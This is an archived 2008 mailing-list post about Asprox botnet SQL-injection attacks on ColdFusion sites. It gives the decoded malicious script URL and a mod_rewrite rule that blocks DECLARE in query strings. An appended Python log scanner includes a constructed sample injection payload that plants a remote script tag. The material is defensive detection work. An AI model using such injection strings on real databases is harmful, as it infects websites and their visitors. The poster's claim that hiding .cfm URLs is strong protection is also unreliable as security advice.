Ok... here's what appears to be hitting us: http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js. That is the Asprox botnet, which went through ASP sites a few months ago... looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF. Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become. In theory this should taper off as the botnet moves on to their next target.

Looks like it's hitting sites such as houseoffusion and our site hardest, which each have zillions of pages indexed in Google (the botnet chooses target pages from Google searches). Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of CF servers, and as such we're likely going to be targeted hard in all manners of attacks in the future. Looks like a good lesson against CF sloppiness.

p.s. we're up to 62000 attack attempts now in 5 hours. Still accelerating, but thankfully not exponential.

Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working:

    # NC: match DECLARE anywhere in the raw query string regardless of case
    # L: stop processing further rules once the request has been rewritten
    RewriteCond %{QUERY_STRING} DECLARE [NC]
    RewriteRule ^(.*)$ violation.htm [L]

Interesting philosophical thought: I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the attacks significantly. It seems to me that such URL rewriting is actually a very important security tool, as we enter a period where botnets start targeting .cfm pages. I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks. Seems to me that it's a lot safer presenting your entire site as HTML to the outside world.
Regards
Terry

--- On Fri, 8/8/08, Wil Genovese <[EMAIL PROTECTED]> wrote:

> From: Wil Genovese <[EMAIL PROTECTED]>
> Subject: Re: SQL injection attacks getting out of control
> To: "CF-Linux" <[email protected]>
> Date: Friday, August 8, 2008, 12:11 PM
>
> what is your rewrite rule? I'm ok with mod_rewrite, but no expert
> that's for sure.
>
> Wil Genovese
>
> One man with courage makes a majority.
> -Andrew Jackson
>
> A fine is a tax for doing wrong. A tax is a fine for doing well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4433
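Decoding the hex in the attack strings, as Terry describes doing by hand above, can be automated. The following Python script is an added example (not from this thread or from any project it mentions) that scans Apache combined-format access-log lines for the DECLARE ... CAST(0x... AS NVARCHAR) ... EXEC pattern, decodes the UTF-16LE payload and pulls out the script URL it references, working on the raw query string the same way mod_rewrite's %{QUERY_STRING} sees it. The log lines, client addresses and the example.invalid URL are constructed sample data.

```python
import re
import urllib.parse

# Shape of an Asprox-style request: ...;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x... AS NVARCHAR(4000));EXEC(@S);--
INJECT_MARKER = re.compile(r"\bDECLARE\b.*\bEXEC\b", re.IGNORECASE | re.DOTALL)
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_hex_payload(hex_digits):
    """Turn a 0x... literal back into text. NVARCHAR payloads are UTF-16LE, so every
    second byte is 0x00 ('SET' -> 530045005400); VARCHAR payloads are single-byte."""
    raw = bytes.fromhex(hex_digits)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")

def analyze_request(target):
    """Return (decoded payloads, script URLs) for an injected request target, or None if clean."""
    # The access log and mod_rewrite's %{QUERY_STRING} both carry the raw, still
    # URL-encoded string, so decode it before matching (and match case-insensitively).
    plain = urllib.parse.unquote_plus(target)
    if not INJECT_MARKER.search(plain):
        return None
    payloads = [decode_hex_payload(h) for h in HEX_CAST.findall(plain)]
    urls = sorted({u for p in payloads for u in URL_RE.findall(p)})
    return payloads, urls

def scan_log(lines):
    """Yield (client ip, script URLs) for every hit in an Apache combined-format log."""
    for line in lines:
        m = REQUEST_TARGET.search(line)
        found = analyze_request(m.group(1)) if m else None
        if found:
            yield line.split()[0], found[1]

# Constructed sample traffic (not real log data): the injected script tag is hex-encoded
# as UTF-16LE inside CAST(0x... AS NVARCHAR), the way the attack in the thread encodes it.
_PAYLOAD_HEX = "SET @T='<script src=http://example.invalid/w.js></script>'".encode("utf-16-le").hex()
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2008:12:11:00 -0500] "GET /product.cfm?id=14;DECLARE%20@S%20NVARCHAR(4000);'
    'SET%20@S=CAST(0x' + _PAYLOAD_HEX + '%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [08/Aug/2008:12:11:05 -0500] "GET /product.cfm?id=15 HTTP/1.1" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for ip, urls in scan_log(SAMPLE_LOG):
        print(ip, urls)
```

Because the match runs on the URL-decoded, case-folded string, a lower-case "declare" variant is still reported, which is the case a case-sensitive RewriteCond would miss.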
